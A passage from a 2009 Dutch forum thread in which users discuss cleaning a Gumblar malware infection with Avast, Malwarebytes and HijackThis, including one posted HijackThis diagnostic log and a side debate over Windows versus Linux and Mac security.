    Ik ga even wat anders doen hoor Ik update wel als malwarebytes klaar is!
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 13:55:20 #113
    105263 Litso
    Interlectueel.
    pi_71788741
    quote:
    Op dinsdag 11 augustus 2009 13:51 schreef Qwea het volgende:

    [..]

    vind je???

    Ik vind het echt een ideale scanner
    Er staat nergens tekst, alleen een oerlelijk metallic design met een paar knoppen die niet voor zich spreken. Ik moet elke keer met mijn muis over de knoppen hoveren om te zien wat ze eigenlijk doen.
    Verder past er amper tekst in het schermpje waardoor er vanalles wordt afgekort, en kan ik nergens zien of en hoeveel bedreigingen er eigenlijk al zijn gevonden. En een 'settings' ofzo is er ook niet.
    "Dat is echt ontzettend zielig" ©
      Redactie Games dinsdag 11 augustus 2009 @ 13:55:59 #114
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71788758
    Overigens heb je met Malwarebytes, "Perform Full Scan" gedaan? Die staat standaard volgens mij niet aan namelijk..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:57:57 #115
    111829 MissBliss
    Godin van SHO
    pi_71788806
    Ja, volledige scan.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 13:58:12 #116
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788810
    quote:
    Op dinsdag 11 augustus 2009 13:55 schreef Litso het volgende:

    [..]

    Er staat nergens tekst, alleen een oerlelijk metallic design met een paar knoppen die niet voor zich spreken. Ik moet elke keer met mijn muis over de knoppen hoveren om te zien wat ze eigenlijk doen.
    Verder past er amper tekst in het schermpje waardoor er vanalles wordt afgekort, en kan ik nergens zien of en hoeveel bedreigingen er eigenlijk al zijn gevonden. En een 'settings' ofzo is er ook niet.
    Hehehe.. in je taakbalk, naast je klok staat een mooi avast rondje, rechtermuisknop en dan programma instellingen

    Daar heb je instellingen die je kan aanpassen
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 14:02:28 #117
    262 Re
    Kiss & Swallow
    pi_71788928
    quote:
    Op dinsdag 11 augustus 2009 13:58 schreef Qwea het volgende:

    [..]

    Hehehe.. in je taakbalk, naast je klok staat een mooi avast rondje, rechtermuisknop en dan programma instellingen

    Daar heb je instellingen die je kan aanpassen
    de virusscan display is gewoon een beetje ruk vind ik ook wel eigenlijk...
    04-08-11, 02-02-12, 20-06-14, 13-08-15
      dinsdag 11 augustus 2009 @ 14:04:40 #118
    105263 Litso
    Interlectueel.
    pi_71788991
    Nou, avast vindt ook niks dus het zal meevallen
    "Dat is echt ontzettend zielig" ©
      dinsdag 11 augustus 2009 @ 14:07:31 #119
    79166 Qwea
    #teampindakaas #viesdik
    pi_71789093
    quote:
    Op dinsdag 11 augustus 2009 14:04 schreef Litso het volgende:
    Nou, avast vindt ook niks dus het zal meevallen
    Ik zou toch malware bytes doen, gewoon voor de zekerheid
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 14:08:06 #120
    79166 Qwea
    #teampindakaas #viesdik
    pi_71789105
    quote:
    Op dinsdag 11 augustus 2009 14:02 schreef Re het volgende:

    [..]

    de virusscan display is gewoon een beetje ruk vind ik ook wel eigenlijk...
    klopt. Maar het werkt wel en het vreet niet zoveel geheugen
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71789257
    quote:
    Op dinsdag 11 augustus 2009 13:47 schreef amvrosios het volgende:
    Formateren die zooi,je blijft toch altijd met rotzooi zitten,
    Damn,wat ben ik blij dat er ook gwn linux bestaat!
    Idd, ik ben blij dat ik lekker Ubuntu draai en geen gezeik heb met dit soort rare onzin.
    pi_71789348
    quote:
    Op dinsdag 11 augustus 2009 13:45 schreef Qwea het volgende:

    [..]

    Nou, erg veel tijd. Het bedrijf waar mijn vriend werkt heeft het dus ook. En die hebben dus echt veel ftp gegevens van klanten e.d. En ik geloof dat de halve afdeling nu met dat virus bezig is

    Ik vind het werkelijk een KUT vrius
    Dit al geprobeerd?
    Calmer than you are
      dinsdag 11 augustus 2009 @ 14:20:00 #123
    79166 Qwea
    #teampindakaas #viesdik
    pi_71789387
    quote:
    Op dinsdag 11 augustus 2009 14:14 schreef CasB het volgende:

    [..]

    Idd, ik ben blij dat ik lekker Ubuntu draai en geen gezeik heb met dit soort rare onzin.
    Komen al die linux goeroes weer
    quote:
    Het computer virus probleem is veel minder voorkomend op het UNIX platform, maar dat betekent niet dat het niet bestaat. UNIX virussen (hoewel erg weinig) bestaan wel degelijk. Toegevoegend, sommige van de oudste worms zijn gebaseerd op UNIX! Als je je data belangrijk vind, dan zal je deze feiten moeten accepteren.
    (Noem één Linux vrius? Okay... Bliss.)

    Dit gezegd te hebben, er zijn zeker (en niet verrassend) erg weinig virussen in het wild levensvatbaar op UNIX. Dit komt gedeeltelijk door toegangsrestricties in de werkomgeving. Bijvoorbeeld, als een gebruiker een geïnfecteerd bestand gebruikt, kan het alleen doen wat de gebruiker aan privileges heeft (onder normale omstandigheden-niet veel) dus op z'n minst zal het niet verspreid worden naar andere systemen. Maar als een supergebruiker (of iemand zonder enige restricties) een virus opent, kan het mogelijk het gehele system infecteren en doorgestuurd worden naar andere systemen... etc.

    Ook moeten we onthouden, dat virussen onder UNIX besturingssystemen veel minder voorkomen simpel omdat dit besturingssyteem lang niet zo wijd verspreid is als DOS/Windows besturingssytemen voor thuisgebruikers. Als er meer mensen thuis gebruik zullen maken van UNIX, zullen er meer virussen hun weg zoeken. De opkomst van het GNU/Linux besturingssysteem heeft dit zeker aangetoond.

    Wees gewaarschuwd, als UNIX-achtige systemen zoals GNU/Linux populairder worden en makkelijker voor thuisgebruik, zullen meer en meer onervaren gebruikers hun systeem laten opereren met volledige toegangsrechten voor allen en op die manier malware een makkelijke manier geven om hun systeem te verstoren.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 14:20:53 #124
    79166 Qwea
    #teampindakaas #viesdik
    pi_71789418
    quote:
    Op dinsdag 11 augustus 2009 14:18 schreef Walter_Sobchak het volgende:

    [..]

    Dit al geprobeerd?
    Flikker op met je mac. Er staat er hier 1. Ik blijf mooi op windows.

    Trouwens, zet jullie semi geile kwijlsessies op linux en apple eens elders voort gaarne.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71789600
    quote:
    Op dinsdag 11 augustus 2009 14:20 schreef Qwea het volgende:

    [..]

    Komen al die linux goeroes weer
    [..]
    Ik kan er ook niks aan doen dat de beveiliging van Windows zo slecht is. Ik heb zelf ook wel eens last gehad van malware in Windows, en het is te belachelijk voor woorden dat de enige oplossing is dat je je pc moet formatteren.

    Maar dat terzijde.

    Via wat voor flash/adobe programma ben je er dan eigenlijk aangekomen? Kan dat al als je op een site komt met dat iframe?
    pi_71789626
    quote:
    Op dinsdag 11 augustus 2009 14:20 schreef Qwea het volgende:

    [..]

    Flikker op met je mac. Er staat er hier 1. Ik blijf mooi op windows.

    Trouwens, zet jullie semi geile kwijlsessies op linux en apple eens elders voort gaarne.
    Ben je mal? Ik vermaak me hier prima. Ik krijg er altijd dit gevoel bij.
    Calmer than you are
      dinsdag 11 augustus 2009 @ 14:30:42 #127
    262 Re
    Kiss & Swallow
    pi_71789689
    quote:
    Op dinsdag 11 augustus 2009 14:28 schreef Walter_Sobchak het volgende:

    [..]

    Ben je mal? Ik vermaak me hier prima. Ik krijg er altijd gevoel bij.
    zou je gewoon op willen zouten , dank
    04-08-11, 02-02-12, 20-06-14, 13-08-15
      dinsdag 11 augustus 2009 @ 14:31:59 #128
    79166 Qwea
    #teampindakaas #viesdik
    pi_71789737
    quote:
    Op dinsdag 11 augustus 2009 14:27 schreef CasB het volgende:

    [..]

    Ik kan er ook niks aan doen dat de beveiliging van Windows zo slecht is. Ik heb zelf ook wel eens last gehad van malware in Windows, en het is te belachelijk voor woorden dat de enige oplossing is dat je je pc moet formatteren.

    Maar dat terzijde.

    Via wat voor flash/adobe programma ben je er dan eigenlijk aangekomen? Kan dat al als je op een site komt met dat iframe?
    Via adobe flash en reader. Geen idee hoe het precies werkt, ik heb nog geen last van het kreng gehad

    En formatten is IMHO ook wel erg rigoreus. Als ik een virus niet "normaal" weg krijg dan ga ik in het register spitten
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 14:44:51 #129
    111829 MissBliss
    Godin van SHO
    pi_71790085
    Simpleviewer werkt met Adobe Flash.

    En het Apple en linuxgezeik mag van mij wel in een ander topic
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      Redactie Games dinsdag 11 augustus 2009 @ 14:50:56 #130
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71790252
    quote:
    Op dinsdag 11 augustus 2009 14:31 schreef Qwea het volgende:

    [..]

    Via adobe flash en reader. Geen idee hoe het precies werkt, ik heb nog geen last van het kreng gehad

    En formatten is IMHO ook wel erg rigoreus. Als ik een virus niet "normaal" weg krijg dan ga ik in het register spitten
    Meeste mensen snappen van dat in het register spitten ook geen drol. Dus als dat niet lukt, dan blijft echt alleen formatteren over. Het scheelt in ieder geval een hoop tijd aan uitzoeken. Maar goed, we kijken eerst maar wat Malwarebytes oplevert.
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
    pi_71790796
    Damn, heb net wat spyware opgelopen op jouw site. AVG hield het vreemdgenoeg niet goed tegen.
      dinsdag 11 augustus 2009 @ 15:24:06 #132
    79166 Qwea
    #teampindakaas #viesdik
    pi_71791315
    quote:
    Op dinsdag 11 augustus 2009 14:50 schreef Mr.Noodle het volgende:

    [..]

    Meeste mensen snappen van dat in het register spitten ook geen drol. Dus als dat niet lukt, dan blijft echt alleen formatteren over. Het scheelt in ieder geval een hoop tijd aan uitzoeken. Maar goed, we kijken eerst maar wat Malwarebytes oplevert.
    Nou ja, tijd aan uitzoeken? Weet je hoe omslachtig formatten is? Je kan alle partities gaan formatten. Dus je moet een back up maken, windows opnieuw installen, ect

    Je laat het een beetje klinken alsof formatten binnen een half u gepiept is wast maar zo simpel
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 15:24:54 #133
    79166 Qwea
    #teampindakaas #viesdik
    pi_71791340
    quote:
    Op dinsdag 11 augustus 2009 15:08 schreef Noork het volgende:
    Damn, heb net wat spyware opgelopen op jouw site. AVG hield het vreemdgenoeg niet goed tegen.
    Sorry hoor, maar er staat VIRUS in de OP, de link in de OP is weggehaald, en er staat een waarschuwing. En toch ga je nog klikken?

    Ik krijg iig geen avast melding meer
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 15:27:32 #134
    111829 MissBliss
    Godin van SHO
    pi_71791429
    Volgens mij is Malwarebytes vastgelopen
    Als ik hem maximaliseer krijg ik zo'n wit scherm
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71791545
    quote:
    Op dinsdag 11 augustus 2009 15:24 schreef Qwea het volgende:

    [..]

    Sorry hoor, maar er staat VIRUS in de OP, de link in de OP is weggehaald, en er staat een waarschuwing. En toch ga je nog klikken?

    Ik krijg iig geen avast melding meer
    Moet toch zien waar het over gaat En ik verwijt niemand, geef het alleen maar aan. Meestal val ik met Opera als browser en AVG buiten schot bij dit soort virussen...
      dinsdag 11 augustus 2009 @ 15:31:43 #136
    79166 Qwea
    #teampindakaas #viesdik
    pi_71791562
    quote:
    Op dinsdag 11 augustus 2009 15:27 schreef MissBliss het volgende:
    Volgens mij is Malwarebytes vastgelopen
    Als ik hem maximaliseer krijg ik zo'n wit scherm


    Ooh boy.

    En als je hem in veilige modus draait?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 15:32:22 #137
    79166 Qwea
    #teampindakaas #viesdik
    pi_71791581
    quote:
    Op dinsdag 11 augustus 2009 15:31 schreef Noork het volgende:

    [..]

    Moet toch zien waar het over gaat En ik verwijt niemand, geef het alleen maar aan. Meestal val ik met Opera als browser en AVG buiten schot bij dit soort virussen...
    Ik vind het alleen een beetje dom van je Maar goed

    Ga maar malware draaien !
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71791638
    quote:
    Op dinsdag 11 augustus 2009 15:32 schreef Qwea het volgende:

    [..]

    Ik vind het alleen een beetje dom van je Maar goed

    Ga maar malware draaien !
    Is al opgelost. Hijackthis en een paar dingen verwijderen was voldoende.
      dinsdag 11 augustus 2009 @ 15:34:52 #139
    111829 MissBliss
    Godin van SHO
    pi_71791646
    quote:
    Op dinsdag 11 augustus 2009 @ 15:31 schreef Qwea het volgende:

    [..]



    Ooh boy.

    En als je hem in veilige modus draait?
    Taakbeheer liep zelfs vast

    Nou, poging 2!
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 15:35:06 #140
    192696 CantFazeMe
    Scroll my bar
    pi_71791656
    Haal het linkje weg uit de OP misschien.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 15:37:25 #141
    111829 MissBliss
    Godin van SHO
    pi_71791718
    quote:
    Op dinsdag 11 augustus 2009 @ 15:35 schreef CantFazeMe het volgende:
    Haal het linkje weg uit de OP misschien.
    Dat staat er niet meer in Er staat zelfs een waarschuwing!

    Ik zal hem wel even uit mn sig halen ook.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71791822
    Ik wil dit topic even volgen.
      dinsdag 11 augustus 2009 @ 15:41:56 #143
    79166 Qwea
    #teampindakaas #viesdik
    pi_71791843
    tof!

    ik heb hem ook ?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 15:42:03 #144
    192696 CantFazeMe
    Scroll my bar
    pi_71791846
    quote:
    Op dinsdag 11 augustus 2009 15:37 schreef MissBliss het volgende:

    [..]

    Dat staat er niet meer in Er staat zelfs een waarschuwing!

    Ik zal hem wel even uit mn sig halen ook.
    Dank je.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 15:42:17 #145
    192696 CantFazeMe
    Scroll my bar
    pi_71791852
    quote:
    Op dinsdag 11 augustus 2009 15:41 schreef Qwea het volgende:
    tof!

    ik heb hem ook ?
    O really?
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 15:42:46 #146
    111829 MissBliss
    Godin van SHO
    pi_71791866
    quote:
    Op dinsdag 11 augustus 2009 @ 15:41 schreef Qwea het volgende:
    tof!

    ik heb hem ook ?
    ?
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 15:44:56 #147
    79166 Qwea
    #teampindakaas #viesdik
    pi_71791927
    C:\Users\Qwea\AppData\Roaming\Mozilla\Firefox\Profiles\zgodd7xy.default\formhistory.sqlite-journal



    *zucht*

    *malware bytes download
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 15:45:12 #148
    79166 Qwea
    #teampindakaas #viesdik
    pi_71791939
    quote:
    Op dinsdag 11 augustus 2009 15:42 schreef CantFazeMe het volgende:

    [..]

    O really?
    ya, really
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 15:46:05 #149
    79166 Qwea
    #teampindakaas #viesdik
    pi_71791962
    elke x dat ik ga googlen flipt avast nu
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 15:49:11 #150
    192696 CantFazeMe
    Scroll my bar
    pi_71792044
    quote:
    Op dinsdag 11 augustus 2009 15:46 schreef Qwea het volgende:
    elke x dat ik ga googlen flipt avast nu
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 15:49:14 #151
    111829 MissBliss
    Godin van SHO
    pi_71792048
    Oh balen
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 15:49:40 #152
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792061
    Het bestand in file:///C:/Users/Qwea/AppData/Roaming/Mozilla/Firefox/Profiles/zgodd7xy.default/

    en dan die formhistory kan ook gewoon niet verwijderd worden ennu zittie ook in places ik had godverdomme net mn laptop gekocht en geconfigged donderdag!
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 15:50:15 #153
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792079
    quote:
    Op dinsdag 11 augustus 2009 15:49 schreef CantFazeMe het volgende:

    [..]

    echt
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 15:52:51 #154
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792148
    quote:
    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 15:52:04, on 11-8-2009
    Platform: Windows Vista SP1 (WinNT 6.00.1905)
    MSIE: Internet Explorer v8.00 (8.00.6001.18813)
    Boot mode: Normal

    Running processes:
    C:\Windows\system32\taskeng.exe
    C:\Windows\system32\Dwm.exe
    C:\Windows\Explorer.EXE
    C:\Program Files\Samsung\EBM\EasyBatteryMgr3.exe
    C:\Program Files\Samsung\Samsung Magic Doctor\MagicDoctorKbdHk.exe
    C:\Program Files\SAMSUNG\EasySpeedUpManager\EasySpeedUpManager.exe
    C:\Program Files\Samsung\Easy Display Manager\dmhkcore.exe
    C:\Program Files\Samsung\Samsung Update Plus\SUPBackground.exe
    C:\Windows\System32\igfxtray.exe
    C:\Windows\System32\hkcmd.exe
    C:\Windows\System32\igfxpers.exe
    C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
    C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    C:\Program Files\Alwil Software\Avast4\ashDisp.exe
    C:\Windows\system32\igfxsrvc.exe
    C:\Windows\system32\igfxext.exe
    C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
    C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    C:\Program Files\Alwil Software\Avast4\ashSimpl.exe
    C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\Windows\system32\SearchFilterHost.exe
    C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
    O1 - Hosts: ::1 localhost
    O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
    O2 - BHO: Windows Live Aanmelden - Help - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
    O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
    O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
    O4 - HKLM\..\Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
    O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
    O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
    O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
    O13 - Gopher Prefix:
    O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
    O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
    O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
    O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
    O23 - Service: Lavasoft Ad-Aware Service - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe

    --
    End of file - 3746 bytes
    Mn hijackthis log. Roept u maar!
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 15:53:10 #155
    192696 CantFazeMe
    Scroll my bar
    pi_71792159
    quote:
    Op dinsdag 11 augustus 2009 15:50 schreef Qwea het volgende:

    [..]

    echt
    Ik geloof je wel hoor.

    Verwijder hem maar snel.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 15:53:11 #156
    111829 MissBliss
    Godin van SHO
    pi_71792161
    Je hebt toch Vista? Daar kon het toch juist niet op komen?
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      FOK!-Schrikkelbaas dinsdag 11 augustus 2009 @ 15:53:38 #157
    1972 Swetsenegger
    Egocentrische Narcist
    pi_71792171
    quote:
    Op dinsdag 11 augustus 2009 15:49 schreef Qwea het volgende:
    Het bestand in file:///C:/Users/Qwea/AppData/Roaming/Mozilla/Firefox/Profiles/zgodd7xy.default/

    en dan die formhistory kan ook gewoon niet verwijderd worden ennu zittie ook in places ik had godverdomme net mn laptop gekocht en geconfigged donderdag!
    Nou dan heb je nog weinig spannende data. Formateren maar.
      dinsdag 11 augustus 2009 @ 15:54:56 #158
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792212
    quote:
    Op dinsdag 11 augustus 2009 15:53 schreef Swetsenegger het volgende:

    [..]

    Nou dan heb je nog weinig spannende data. Formateren maar.
    ik heb nooit spannende data wat niet 30x gebackupt is.

    Eerst eens zien of het met hijackthis en malware wil. Zo niet pleur ik straks alles wel leeg. Wat ik me afvraag... bij het installen van de pc is er een backup gemaakt toen windows klaar was... kan ik die gewoon terug zetten? of zit dat kreng daar ook in ?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 15:55:17 #159
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792223
    quote:
    Op dinsdag 11 augustus 2009 15:53 schreef CantFazeMe het volgende:

    [..]

    Ik geloof je wel hoor.

    Verwijder hem maar snel.
    als jij mn hijackthis log wil checken?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 15:55:32 #160
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792230
    quote:
    Op dinsdag 11 augustus 2009 15:53 schreef MissBliss het volgende:
    Je hebt toch Vista? Daar kon het toch juist niet op komen?
    dikke stront dus, blijkbaar
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 15:59:32 #161
    192696 CantFazeMe
    Scroll my bar
    pi_71792318
    quote:
    Op dinsdag 11 augustus 2009 15:55 schreef Qwea het volgende:

    [..]

    als jij mn hijackthis log wil checken?
    't ziet er goed uit juist. Hardnekkig die Gumblar. Kan je ook Malwarebytes erop los laten?

    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file) <<< Fix checked

    oobefldr.dll <<< Onderdeel van Vista? Denk t wel.
    http://www.google.nl/search?hl=nl&q=oobefldr.dll&btnG=Zoeken&meta=lr%3Dlang_nl
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 16:01:50 #162
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792395
    quote:
    Op dinsdag 11 augustus 2009 15:59 schreef CantFazeMe het volgende:

    [..]

    't ziet er goed uit juist. Hardnekkig die Gumblar. Kan je ook Malwarebytes erop los laten?

    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file) <<< Fix checked

    oobefldr.dll <<< Onderdeel van Vista? Denk t wel.
    http://www.google.nl/search?hl=nl&q=oobefldr.dll&btnG=Zoeken&meta=lr%3Dlang_nl
    Malware is al bezig. Hijack was eerder klaar

    Windows errors related to oobefldr.dll?

    oobefldr.dll is a process belonging to the Microsoft® Windows® Operating System program . "oobefldr.dll is a Welcome Center Component" "from Microsoft Corporation" "belonging to Microsoft® Windows® Operating System"

    ik hoef dus niks te verwijderen en kan hem (hijackthis) afsluiten?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 16:04:33 #163
    192696 CantFazeMe
    Scroll my bar
    pi_71792491
    quote:
    Op dinsdag 11 augustus 2009 16:01 schreef Qwea het volgende:

    [..]

    Malware is al bezig. Hijack was eerder klaar

    Windows errors related to oobefldr.dll?

    oobefldr.dll is a process belonging to the Microsoft® Windows® Operating System program . "oobefldr.dll is a Welcome Center Component" "from Microsoft Corporation" "belonging to Microsoft® Windows® Operating System"

    ik hoef dus niks te verwijderen en kan hem (hijackthis) afsluiten?
    Nee niet echt, die (no file) kun je eventueel verwijderen, maar de rest niet. Die no file doet niks zeg maar
    Ok. Laat die dll maar staan idd.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      FOK!-Schrikkelbaas dinsdag 11 augustus 2009 @ 16:05:02 #164
    1972 Swetsenegger
    Egocentrische Narcist
    pi_71792507
    Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft
      dinsdag 11 augustus 2009 @ 16:08:04 #165
    111829 MissBliss
    Godin van SHO
    pi_71792590
    quote:
    Op dinsdag 11 augustus 2009 @ 16:05 schreef Swetsenegger het volgende:
    Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft
    Ik snap niet wat je precies typt, maar ik gebruik dus ook filezilla en het ergerde me juist zo dat ie mn inloggegevens nooit onthield Maar dat doet ie dus kennelijk wél
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 16:08:14 #166
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792596
    quote:
    Op dinsdag 11 augustus 2009 16:04 schreef CantFazeMe het volgende:

    [..]

    Nee niet echt, die (no file) kun je eventueel verwijderen, maar de rest niet. Die no file doet niks zeg maar
    Ok. Laat die dll maar staan idd.
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)

    weggepleurd

    Nou, nu maar ff wachten op malwarebytes
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 16:08:54 #167
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792624
    quote:
    Op dinsdag 11 augustus 2009 16:05 schreef Swetsenegger het volgende:
    Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft
    ja, daar kwam MM gisteren ook achter en op zn werk gebruiken ze.... juist! filezilla
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 16:09:46 #168
